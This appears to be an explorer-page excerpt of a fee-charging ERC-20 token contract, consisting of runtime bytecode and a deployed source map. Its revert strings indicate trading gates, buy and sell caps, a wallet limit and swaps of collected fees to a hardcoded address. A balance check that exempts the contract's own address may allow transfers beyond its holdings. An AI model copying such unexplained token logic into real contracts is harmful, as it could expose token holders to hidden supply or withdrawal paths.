f45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016108a1565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6040805160028082526060820183525f9260208301908036833701905050905030815f8151811061108757611087611cd8565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611103573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906111279190611c60565b8160018151811061113a5761113a611cd8565b60200260200101906001600160a01b031690816001600160a01b031681525050611185307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610f31565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac947906111ed9085905f908690733f687f43c3aaa91aad30d255024132c51db3b8ca904290600401611cec565b5f604051808303815f87803b158015611204575f80fd5b505af1158015611216573d5f803e3d5ffd5b505050505050565b5f6112298484610e91565b90505f19811461129057818110156112835760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016108a1565b6112908484848403610f31565b50505050565b6001600160a01b0383166112bc5760405162461bcd60e51b81526004016108a190611d5b565b601454600d54106112ce576010546012555b601554600e54106112e0576011546013555b805f036112f7576112f283835f61191d565b505050565b6005546001600160a01b0384811691161480159061132357506005546001600160a01b03838116911614155b801561133757506001600160a01b03821615155b801561134e57506001600160a01b03821661dead14155b80156113645750600854600160a01b900460ff16155b1561165957600f5460ff166113f5576001600160a01b0383165f9081526016602052604090205460ff16806113b057506001600160a01b0382165f9081526016602052604090205460ff165b6113f55760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016108a1565b6001600160a01b0383165f9081526018602052604090205460ff16801561143457506001600160a01b0382165f9081526017602052604090205460ff16155b1561151c57600a548111156114a95760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016108a1565b600b546114b5836107d9565b6114bf9083611c36565b11156115035760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108a1565b600d8054905f61151283611da0565b9190505550611659565b6001600160a01b0382165f9081526018602052604090205460ff16801561155b57506001600160a01b0383165f9081526017602052604090205460ff16155b156115e057600a548111156115d15760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016108a1565b600e8054905f61151283611da0565b6001600160a01b0382165f9081526017602052604090205460ff1661165957600b5461160b836107d9565b6116159083611c36565b11156116595760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016108a1565b5f611663306107d9565b90508015801590819061167d5750600f54610100900460ff165b80156116935750600854600160a01b900460ff16155b80156116b757506001600160a01b0385165f9081526018602052604090205460ff16155b80156116db57506001600160a01b0385165f9081526016602052604090205460ff16155b80156116ff57506001600160a01b0384165f9081526016602052604090205460ff16155b1561172e576008805460ff60a01b1916600160a01b17905561172083611a42565b6008805460ff60a01b191690555b6008546001600160a01b0386165f9081526016602052604090205460ff600160a01b90920482161591168061177a57506001600160a01b0385165f9081526016602052604090205460ff165b1561178257505f5b5f811561180b576001600160a01b0386165f9081526018602052604090205460ff16156117d0576117c960646117c360135488611a6490919063ffffffff16565b90611a76565b90506117ed565b6117ea60646117c360125488611a6490919063ffffffff16565b90505b80156117fe576117fe87308361191d565b6118088186611db8565b94505b61181687878761191d565b50505050505050565b6005546001600160a01b031633146108045760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016108a1565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b0382165f81815260186020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0383166119435760405162461bcd60e51b81526004016108a190611d5b565b6001600160a01b0383165f90815260208190526040902054818110158061197257506001600160a01b03831630145b6119cd5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016108a1565b8181106119dc578181036119de565b5f5b6001600160a01b038581165f818152602081815260408083209590955592871680825290849020805487019055925185815290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3611290565b5f611a4c306107d9565b90505f815f03611a595750815b50806112f281611054565b5f611a6f8284611c49565b9392505050565b5f611a6f8284611dcb565b5f6020808352835180828501525f5b81811015611aac57858101830151858201604001528201611a90565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107d6575f80fd5b5f8060408385031215611af1575f80fd5b8235611afc81611acc565b946020939093013593505050565b5f60208284031215611b1a575f80fd5b5035919050565b5f805f60608486031215611b33575f80fd5b8335611b3e81611acc565b92506020840135611b4e81611acc565b929592945050506040919091013590565b5f60208284031215611b6f575f80fd5b8135611a6f81611acc565b80151581146107d6575f80fd5b5f8060408385031215611b98575f80fd5b8235611ba381611acc565b91506020830135611bb381611b7a565b809150509250929050565b5f8060408385031215611bcf575f80fd5b8235611bda81611acc565b91506020830135611bb381611acc565b600181811c90821680611bfe57607f821691505b602082108103611c1c57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561071457610714611c22565b808202811582820484141761071457610714611c22565b5f60208284031215611c70575f80fd5b8151611a6f81611acc565b5f60208284031215611c8b575f80fd5b8151611a6f81611b7a565b5f60208284031215611ca6575f80fd5b5051919050565b5f805f60608486031215611cbf575f80fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015611d3a5784516001600160a01b031683529383019391830191600101611d15565b50506001600160a01b03969096166060850152505050608001529392505050565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b5f60018201611db157611db1611c22565b5060010190565b8181038181111561071457610714611c22565b5f82611de557634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220c40ecfed5e4db3e8a9b8a313472b0969804c277b20e03db2cee01d3247d6345864736f6c63430008140033

Deployed Bytecode Sourcemap

29259:8439:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19066:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20685:201;;;;;;;;;;-1:-1:-1;20685:201:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;20685:201:0;1023:187:1;30024:24:0;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;30024:24:0;1215:177:1;19454:108:0;;;;;;;;;;-1:-1:-1;19542:12:0;;19454:108;;37122:255;;;;;;;;;;-1:-1:-1;37122:255:0;;;;;:::i;:::-;;:::i;:::-;;21466:261;;;;;;;;;;-1:-1:-1;21466:261:0;;;;;:::i;:::-;;:::i;29739:60::-;;;;;;;;;;;;;;;;31593:100;;;;;;;;;;-1:-1:-1;29731:1:0;31593:100;;;2215:4:1;2203:17;;;2185:36;;2173:2;2158:18;31593:100:0;2043:184:1;29697:35:0;;;;;;;;;;;;29731:1;29697:35;;22136:238;;;;;;;;;;-1:-1:-1;22136:238:0;;;;;:::i;:::-;;:::i;30210:27::-;;;;;;;;;;;;;;;;33277:126;;;;;;;;;;-1:-1:-1;33277:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;33367:28:0;33343:4;33367:28;;;:19;:28;;;;;;;;;33277:126;36919:195;;;;;;;;;;;;;:::i;29336:52::-;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;2674:32:1;;;2656:51;;2644:2;2629:18;29336:52:0;2484:229:1;30244:28:0;;;;;;;;;;;;;;;;30095:31;;;;;;;;;;-1:-1:-1;30095:31:0;;;;;;;;;;;19625:127;;;;;;;;;;-1:-1:-1;19625:127:0;;;;;:::i;:::-;;:::i;17590:103::-;;;;;;;;;;;;;:::i;36387:194::-;;;;;;;;;;;;;:::i;32465:159::-;;;;;;;;;;-1:-1:-1;32465:159:0;;;;;:::i;:::-;;:::i;36589:185::-;;;;;;;;;;;;;:::i;16949:87::-;;;;;;;;;;-1:-1:-1;17022:6:0;;-1:-1:-1;;;;;17022:6:0;16949:87;;19285:104;;;;;;;;;;;;;:::i;32822:253::-;;;;;;;;;;-1:-1:-1;32822:253:0;;;;;:::i;:::-;;:::i;36782:129::-;;;;;;;;;;-1:-1:-1;36782:129:0;;;;;:::i;:::-;;:::i;22877:424::-;;;;;;;;;;-1:-1:-1;22877:424:0;;;;;:::i;:::-;;:::i;19958:193::-;;;;;;;;;;-1:-1:-1;19958:193:0;;;;;:::i;:::-;;:::i;32632:182::-;;;;;;;;;;-1:-1:-1;32632:182:0;;;;;:::i;:::-;;:::i;29806:60::-;;;;;;;;;;;;;;;;31701:756;;;;;;;;;;;;;:::i;29994:23::-;;;;;;;;;;;;;;;;20214:151;;;;;;;;;;-1:-1:-1;20214:151:0;;;;;:::i;:::-;;:::i;29929:58::-;;;;;;;;;;;;;;;;30172:31;;;;;;;;;;;;;;;;30135:30;;;;;;;;;;;;;;;;17848:201;;;;;;;;;;-1:-1:-1;17848:201:0;;;;;:::i;:::-;;:::i;29873:49::-;;;;;;;;;;;;;;;;30057:31;;;;;;;;;;-1:-1:-1;30057:31:0;;;;;;;;19066:100;19120:13;19153:5;19146:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19066:100;:::o;20685:201::-;20768:4;16245:10;20824:32;16245:10;20840:7;20849:6;20824:8;:32::i;:::-;20874:4;20867:11;;;20685:201;;;;;:::o;37122:255::-;37212:15;;-1:-1:-1;;;;;37212:15:0;16245:10;-1:-1:-1;;;;;37196:31:0;;37188:40;;;;;;37239:23;37265:24;37283:4;37265:9;:24::i;:::-;37239:50;;37318:15;37308:6;:25;;37300:34;;;;;;37345:24;37362:6;37345:16;:24::i;:::-;37177:200;37122:255;:::o;21466:261::-;21563:4;16245:10;21621:38;21637:4;16245:10;21652:6;21621:15;:38::i;:::-;21670:27;21680:4;21686:2;21690:6;21670:9;:27::i;:::-;-1:-1:-1;21715:4:0;;21466:261;-1:-1:-1;;;;21466:261:0:o;22136:238::-;22224:4;16245:10;22280:64;16245:10;22296:7;22333:10;22305:25;16245:10;22296:7;22305:9;:25::i;:::-;:38;;;;:::i;:::-;22280:8;:64::i;36919:195::-;36985:15;;-1:-1:-1;;;;;36985:15:0;16245:10;-1:-1:-1;;;;;36969:31:0;;36961:40;;;;;;37012:23;37038:24;37056:4;37038:9;:24::i;:::-;37012:50;;37073:33;37090:15;37073:16;:33::i;:::-;36950:164;36919:195::o;19625:127::-;-1:-1:-1;;;;;19726:18:0;19699:7;19726:18;;;;;;;;;;;;19625:127::o;17590:103::-;16835:13;:11;:13::i;:::-;17655:30:::1;17682:1;17655:18;:30::i;:::-;17590:103::o:0;36387:194::-;16835:13;:11;:13::i;:::-;36441:25:::1;36469:13;19542:12:::0;;;19454:108;36469:13:::1;36493:20;:40:::0;;;36544:9:::1;:29:::0;-1:-1:-1;36387:194:0:o;32465:159::-;16835:13;:11;:13::i;:::-;-1:-1:-1;;;;;32570:39:0;;;::::1;;::::0;;;:31:::1;:39;::::0;;;;:46;;-1:-1:-1;;32570:46:0::1;::::0;::::1;;::::0;;;::::1;::::0;;32465:159::o;36589:185::-;16835:13;:11;:13::i;:::-;36676:1:::1;36652:21;:25;36644:60;;;::::0;-1:-1:-1;;;36644:60:0;;4678:2:1;36644:60:0::1;::::0;::::1;4660:21:1::0;4717:2;4697:18;;;4690:30;-1:-1:-1;;;4736:18:1;;;4729:52;4798:18;;36644:60:0::1;;;;;;;;;36715:51;::::0;36723:10:::1;::::0;36744:21:::1;36715:51:::0;::::1;;;::::0;::::1;::::0;;;36744:21;36723:10;36715:51;::::1;;;;;;;;;;;;;::::0;::::1;;;;19285:104:::0;19341:13;19374:7;19367:14;;;;;:::i;32822:253::-;16835:13;:11;:13::i;:::-;32944::::1;::::0;-1:-1:-1;;;;;32944:13:0;;::::1;32936:21:::0;;::::1;::::0;32928:87:::1;;;::::0;-1:-1:-1;;;32928:87:0;;5029:2:1;32928:87:0::1;::::0;::::1;5011:21:1::0;5068:2;5048:18;;;5041:30;5107:34;5087:18;;;5080:62;-1:-1:-1;;;5158:18:1;;;5151:51;5219:19;;32928:87:0::1;4827:417:1::0;32928:87:0::1;33026:41;33055:4;33061:5;33026:28;:41::i;36782:129::-:0;16835:13;:11;:13::i;:::-;36883:20:::1;:7:::0;36894:8:::1;36883:20;:::i;:::-;36862:18;:41:::0;-1:-1:-1;36782:129:0:o;22877:424::-;22970:4;16245:10;22970:4;23053:25;16245:10;23070:7;23053:9;:25::i;:::-;23026:52;;23117:15;23097:16;:35;;23089:85;;;;-1:-1:-1;;;23089:85:0;;5624:2:1;23089:85:0;;;5606:21:1;5663:2;5643:18;;;5636:30;5702:34;5682:18;;;5675:62;-1:-1:-1;;;5753:18:1;;;5746:35;5798:19;;23089:85:0;5422:401:1;23089:85:0;23202:60;23211:5;23218:7;23246:15;23227:16;:34;23202:8;:60::i;19958:193::-;20037:4;16245:10;20093:28;16245:10;20110:2;20114:6;20093:9;:28::i;32632:182::-;16835:13;:11;:13::i;:::-;-1:-1:-1;;;;;32717:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;32717:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;32772:34;;1163:41:1;;;32772:34:0::1;::::0;1136:18:1;32772:34:0::1;;;;;;;32632:182:::0;;:::o;31701:756::-;16835:13;:11;:13::i;:::-;31765:11:::1;::::0;::::1;;31764:12;31756:42;;;::::0;-1:-1:-1;;;31756:42:0;;6030:2:1;31756:42:0::1;::::0;::::1;6012:21:1::0;6069:2;6049:18;;;6042:30;-1:-1:-1;;;6088:18:1;;;6081:47;6145:18;;31756:42:0::1;5828:341:1::0;31756:42:0::1;31843:16;-1:-1:-1::0;;;;;31843:24:0::1;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;31825:56:0::1;;31890:4;31897:16;-1:-1:-1::0;;;;;31897:21:0::1;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31825:96;::::0;-1:-1:-1;;;;;;31825:96:0::1;::::0;;;;;;-1:-1:-1;;;;;6660:15:1;;;31825:96:0::1;::::0;::::1;6642:34:1::0;6712:15;;6692:18;;;6685:43;6577:18;;31825:96:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31809:13;:112:::0;;-1:-1:-1;;;;;;31809:112:0::1;-1:-1:-1::0;;;;;31809:112:0;;;::::1;::::0;;::::1;::::0;;31932:58:::1;::::0;-1:-1:-1;31932:28:0::1;:58::i;:::-;32035:13;::::0;32001:55:::1;::::0;-1:-1:-1;;;;;32035:13:0::1;::::0;32001:25:::1;:55::i;:::-;32074:13;::::0;32067:72:::1;::::0;-1:-1:-1;;;32067:72:0;;-1:-1:-1;;;;;32105:16:0::1;6931:32:1::0;;32067:72:0::1;::::0;::::1;6913:51:1::0;-1:-1:-1;;6980:18:1;;;6973:34;32074:13:0;;::::1;::::0;32067:29:::1;::::0;6886:18:1;;32067:72:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;32150:70;32167:4;32182:16;32201:18;;32150:8;:70::i;:::-;32312:46;::::0;-1:-1:-1;;;32312:46:0;;32305:4:::1;32312:46;::::0;::::1;2656:51:1::0;;;-1:-1:-1;;;;;32233:16:0::1;:32;::::0;::::1;::::0;32274:21:::1;::::0;32305:4;;32312:31:::1;::::0;2629:18:1;;32312:46:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;32360:1;32363::::0;32366:7:::1;17022:6:::0;;-1:-1:-1;;;;;17022:6:0;;16949:87;32366:7:::1;32233:158;::::0;::::1;::::0;;;-1:-1:-1;;;;;;32233:158:0;;;-1:-1:-1;;;;;7816:15:1;;;32233:158:0::1;::::0;::::1;7798:34:1::0;7848:18;;;7841:34;;;;7891:18;;;7884:34;;;;7934:18;;;7927:34;7998:15;;;7977:19;;;7970:44;32375:15:0::1;8030:19:1::0;;;8023:35;7732:19;;32233:158:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;32402:11:0::1;:18:::0;;-1:-1:-1;;32431:18:0;;;;;-1:-1:-1;31701:756:0:o;20214:151::-;-1:-1:-1;;;;;20330:18:0;;;20303:7;20330:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;20214:151::o;17848:201::-;16835:13;:11;:13::i;:::-;-1:-1:-1;;;;;17937:22:0;::::1;17929:73;;;::::0;-1:-1:-1;;;17929:73:0;;8582:2:1;17929:73:0::1;::::0;::::1;8564:21:1::0;8621:2;8601:18;;;8594:30;8660:34;8640:18;;;8633:62;-1:-1:-1;;;8711:18:1;;;8704:36;8757:19;;17929:73:0::1;8380:402:1::0;17929:73:0::1;18013:28;18032:8;18013:18;:28::i;26823:346::-:0;-1:-1:-1;;;;;26925:19:0;;26917:68;;;;-1:-1:-1;;;26917:68:0;;8989:2:1;26917:68:0;;;8971:21:1;9028:2;9008:18;;;9001:30;9067:34;9047:18;;;9040:62;-1:-1:-1;;;9118:18:1;;;9111:34;9162:19;;26917:68:0;8787:400:1;26917:68:0;-1:-1:-1;;;;;27004:21:0;;26996:68;;;;-1:-1:-1;;;26996:68:0;;9394:2:1;26996:68:0;;;9376:21:1;9433:2;9413:18;;;9406:30;9472:34;9452:18;;;9445:62;-1:-1:-1;;;9523:18:1;;;9516:32;9565:19;;26996:68:0;9192:398:1;26996:68:0;-1:-1:-1;;;;;27077:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;27129:32;;1361:25:1;;;27129:32:0;;1334:18:1;27129:32:0;;;;;;;26823:346;;;:::o;35909:470::-;36001:16;;;36015:1;36001:16;;;;;;;;35977:21;;36001:16;;;;;;;;;;-1:-1:-1;36001:16:0;35977:40;;36046:4;36028;36033:1;36028:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;36028:23:0;;;-1:-1:-1;;;;;36028:23:0;;;;;36072:16;-1:-1:-1;;;;;36072:21:0;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;36062:4;36067:1;36062:7;;;;;;;;:::i;:::-;;;;;;:33;-1:-1:-1;;;;;36062:33:0;;;-1:-1:-1;;;;;36062:33:0;;;;;36106:63;36123:4;36138:16;36157:11;36106:8;:63::i;:::-;36180:191;;-1:-1:-1;;;36180:191:0;;-1:-1:-1;;;;;36180:16:0;:67;;;;:191;;36262:11;;36288:1;;36304:4;;12319:42;;36345:15;;36180:191;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35964:415;35909:470;:::o;27460:407::-;27561:24;27588:25;27598:5;27605:7;27588:9;:25::i;:::-;27561:52;;-1:-1:-1;;27628:16:0;:37;27624:236;;27710:6;27690:16;:26;;27682:68;;;;-1:-1:-1;;;27682:68:0;;11046:2:1;27682:68:0;;;11028:21:1;11085:2;11065:18;;;11058:30;11124:31;11104:18;;;11097:59;11173:18;;27682:68:0;10844:353:1;27682:68:0;27786:51;27795:5;27802:7;27830:6;27811:16;:25;27786:8;:51::i;:::-;27550:317;27460:407;;;:::o;33413:2488::-;-1:-1:-1;;;;;33511:18:0;;33503:68;;;;-1:-1:-1;;;33503:68:0;;;;;;;:::i;:::-;33600:15;;33588:8;;:27;33584:81;;33642:11;;33632:7;:21;33584:81;33694:16;;33681:9;;:29;33677:85;;33738:12;;33727:8;:23;33677:85;33778:6;33788:1;33778:11;33774:93;;33806:28;33822:4;33828:2;33832:1;33806:15;:28::i;:::-;33413:2488;;;:::o;33774:93::-;17022:6;;-1:-1:-1;;;;;33881:15:0;;;17022:6;;33881:15;;;;:32;;-1:-1:-1;17022:6:0;;-1:-1:-1;;;;;33900:13:0;;;17022:6;;33900:13;;33881:32;:52;;;;-1:-1:-1;;;;;;33917:16:0;;;;33881:52;:77;;;;-1:-1:-1;;;;;;33937:21:0;;33951:6;33937:21;;33881:77;:90;;;;-1:-1:-1;33963:8:0;;-1:-1:-1;;;33963:8:0;;;;33962:9;33881:90;33877:1042;;;33995:11;;;;33990:140;;-1:-1:-1;;;;;34035:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;34064:23:0;;;;;;:19;:23;;;;;;;;34035:52;34027:87;;;;-1:-1:-1;;;34027:87:0;;11810:2:1;34027:87:0;;;11792:21:1;11849:2;11829:18;;;11822:30;-1:-1:-1;;;11868:18:1;;;11861:52;11930:18;;34027:87:0;11608:346:1;34027:87:0;-1:-1:-1;;;;;34150:31:0;;;;;;:25;:31;;;;;;;;:71;;;;-1:-1:-1;;;;;;34186:35:0;;;;;;:31;:35;;;;;;;;34185:36;34150:71;34146:762;;;34274:20;;34264:6;:30;;34256:96;;;;-1:-1:-1;;;34256:96:0;;12161:2:1;34256:96:0;;;12143:21:1;12200:2;12180:18;;;12173:30;12239:34;12219:18;;;12212:62;-1:-1:-1;;;12290:18:1;;;12283:51;12351:19;;34256:96:0;11959:417:1;34256:96:0;34405:9;;34388:13;34398:2;34388:9;:13::i;:::-;34379:22;;:6;:22;:::i;:::-;:35;;34371:67;;;;-1:-1:-1;;;34371:67:0;;12583:2:1;34371:67:0;;;12565:21:1;12622:2;12602:18;;;12595:30;-1:-1:-1;;;12641:18:1;;;12634:49;12700:18;;34371:67:0;12381:343:1;34371:67:0;34457:8;:10;;;:8;:10;;;:::i;:::-;;;;;;34146:762;;;-1:-1:-1;;;;;34508:29:0;;;;;;:25;:29;;;;;;;;:71;;;;-1:-1:-1;;;;;;34542:37:0;;;;;;:31;:37;;;;;;;;34541:38;34508:71;34504:404;;;34618:20;;34608:6;:30;;34600:97;;;;-1:-1:-1;;;34600:97:0;;13071:2:1;34600:97:0;;;13053:21:1;13110:2;13090:18;;;13083:30;13149:34;13129:18;;;13122:62;-1:-1:-1;;;13200:18:1;;;13193:52;13262:19;;34600:97:0;12869:418:1;34600:97:0;34716:9;:11;;;:9;:11;;;:::i;34504:404::-;-1:-1:-1;;;;;34769:35:0;;;;;;:31;:35;;;;;;;;34764:144;;34859:9;;34842:13;34852:2;34842:9;:13::i;:::-;34833:22;;:6;:22;:::i;:::-;:35;;34825:67;;;;-1:-1:-1;;;34825:67:0;;12583:2:1;34825:67:0;;;12565:21:1;12622:2;12602:18;;;12595:30;-1:-1:-1;;;12641:18:1;;;12634:49;12700:18;;34825:67:0;12381:343:1;34825:67:0;34931:28;34962:24;34980:4;34962:9;:24::i;:::-;34931:55;-1:-1:-1;35014:24:0;;;;;;;35055:22;;-1:-1:-1;35066:11:0;;;;;;;35055:22;:35;;;;-1:-1:-1;35082:8:0;;-1:-1:-1;;;35082:8:0;;;;35081:9;35055:35;:71;;;;-1:-1:-1;;;;;;35095:31:0;;;;;;:25;:31;;;;;;;;35094:32;35055:71;:101;;;;-1:-1:-1;;;;;;35131:25:0;;;;;;:19;:25;;;;;;;;35130:26;35055:101;:129;;;;-1:-1:-1;;;;;;35161:23:0;;;;;;:19;:23;;;;;;;;35160:24;35055:129;35051:239;;;35201:8;:15;;-1:-1:-1;;;;35201:15:0;-1:-1:-1;;;35201:15:0;;;35231:16;35240:6;35231:8;:16::i;:::-;35262:8;:16;;-1:-1:-1;;;;35262:16:0;;;35051:239;35318:8;;-1:-1:-1;;;;;35343:25:0;;35302:12;35343:25;;;:19;:25;;;;;;35318:8;-1:-1:-1;;;35318:8:0;;;;;35317:9;;35343:25;;:52;;-1:-1:-1;;;;;;35372:23:0;;;;;;:19;:23;;;;;;;;35343:52;35339:100;;;-1:-1:-1;35422:5:0;35339:100;35451:12;35484:7;35480:370;;;-1:-1:-1;;;;;35512:29:0;;;;;;:25;:29;;;;;;;;35508:195;;;35569:29;35594:3;35569:20;35580:8;;35569:6;:10;;:20;;;;:::i;:::-;:24;;:29::i;:::-;35562:36;;35508:195;;;35659:28;35683:3;35659:19;35670:7;;35659:6;:10;;:19;;;;:::i;:28::-;35652:35;;35508:195;35723:8;;35719:91;;35752:42;35768:4;35782;35789;35752:15;:42::i;:::-;35824:14;35834:4;35824:14;;:::i;:::-;;;35480:370;35860:33;35876:4;35882:2;35886:6;35860:15;:33::i;:::-;33492:2409;;;;33413:2488;;;:::o;17114:132::-;17022:6;;-1:-1:-1;;;;;17022:6:0;16245:10;17178:23;17170:68;;;;-1:-1:-1;;;17170:68:0;;13627:2:1;17170:68:0;;;13609:21:1;;;13646:18;;;13639:30;13705:34;13685:18;;;13678:62;13757:18;;17170:68:0;13425:356:1;18209:191:0;18302:6;;;-1:-1:-1;;;;;18319:17:0;;;-1:-1:-1;;;;;;18319:17:0;;;;;;;18352:40;;18302:6;;;18319:17;18302:6;;18352:40;;18283:16;;18352:40;18272:128;18209:191;:::o;33083:186::-;-1:-1:-1;;;;;33166:31:0;;;;;;:25;:31;;;;;;:39;;-1:-1:-1;;33166:39:0;;;;;;;;;;33221:40;;33166:39;;:31;33221:40;;;33083:186;;:::o;23728:850::-;-1:-1:-1;;;;;23825:18:0;;23817:68;;;;-1:-1:-1;;;23817:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;23971:15:0;;23949:19;23971:15;;;;;;;;;;;24005:21;;;;;:44;;-1:-1:-1;;;;;;24030:19:0;;24044:4;24030:19;24005:44;23997:95;;;;-1:-1:-1;;;23997:95:0;;13988:2:1;23997:95:0;;;13970:21:1;14027:2;14007:18;;;14000:30;14066:34;14046:18;;;14039:62;-1:-1:-1;;;14117:18:1;;;14110:36;14163:19;;23997:95:0;13786:402:1;23997:95:0;24233:6;24221:11;:18;:41;;24256:6;24242:11;:20;24221:41;;;24240:1;24221:41;-1:-1:-1;;;;;24203:15:0;;;:9;:15;;;;;;;;;;;:59;;;;24442:13;;;;;;;;;;:23;;;;;;24494:26;;1361:25:1;;;24203:15:0;;24494:26;;1334:18:1;24494:26:0;;;;;;;24533:37;33413:2488;37385:310;37438:23;37464:24;37482:4;37464:9;:24::i;:::-;37438:50;;37499:20;37534:15;37553:1;37534:20;37530:74;;-1:-1:-1;37586:6:0;37530:74;-1:-1:-1;37631:15:0;37657:30;37631:15;37657:16;:30::i;4360:98::-;4418:7;4445:5;4449:1;4445;:5;:::i;:::-;4438:12;4360:98;-1:-1:-1;;;4360:98:0:o;4759:::-;4817:7;4844:5;4848:1;4844;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:180::-;1456:6;1509:2;1497:9;1488:7;1484:23;1480:32;1477:52;;;1525:1;1522;1515:12;1477:52;-1:-1:-1;1548:23:1;;1397:180;-1:-1:-1;1397:180:1:o;1582:456::-;1659:6;1667;1675;1728:2;1716:9;1707:7;1703:23;1699:32;1696:52;;;1744:1;1741;1734:12;1696:52;1783:9;1770:23;1802:31;1827:5;1802:31;:::i;:::-;1852:5;-1:-1:-1;1909:2:1;1894:18;;1881:32;1922:33;1881:32;1922:33;:::i;:::-;1582:456;;1974:7;;-1:-1:-1;;;2028:2:1;2013:18;;;;2000:32;;1582:456::o;2232:247::-;2291:6;2344:2;2332:9;2323:7;2319:23;2315:32;2312